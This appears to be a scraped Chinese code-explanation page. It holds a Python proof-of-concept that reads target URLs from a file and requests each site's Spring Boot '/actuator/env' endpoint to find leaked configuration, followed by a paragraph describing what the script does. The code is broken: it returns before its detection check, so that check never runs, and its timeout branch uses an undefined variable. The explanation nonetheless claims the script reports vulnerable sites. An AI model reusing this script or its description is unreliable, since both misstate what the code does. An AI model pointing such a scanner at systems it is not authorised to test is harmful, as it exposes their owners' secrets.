import requests def verify(url): payload = '/actuator/env' #print(res.text) try: res = requests.get(url+payload, timeout=5) return res except requests.exceptions.Timeout: print(res+" 请求超时!") return None if 'activeProfiles' in res.text: print(url+'存在信息泄露漏洞') else: print(url+'不存在') if __name__ == '__main__': with open('poc.txt','r') as f: for line2 in f: verify(url=line2)
时间: 2024-02-14 21:07:09 浏览: 151
python爬虫练习:爬图片
这是一个Python脚本,主要是用于检测一个URL是否存在信息泄露漏洞。脚本的核心是发送一个GET请求,其中包含一个特定的URL路径(payload),然后检查响应内容中是否包含'activeProfiles'字段,如果包含,则表示存在漏洞,否则不存在。
脚本使用了requests库发送HTTP请求,以及一个verify函数和一个主函数。主函数从poc.txt文件中读取URL,然后依次调用verify函数进行检测。如果请求超时,则输出"请求超时!";如果存在漏洞,则输出"存在信息泄露漏洞";否则输出"不存在"。
阅读全文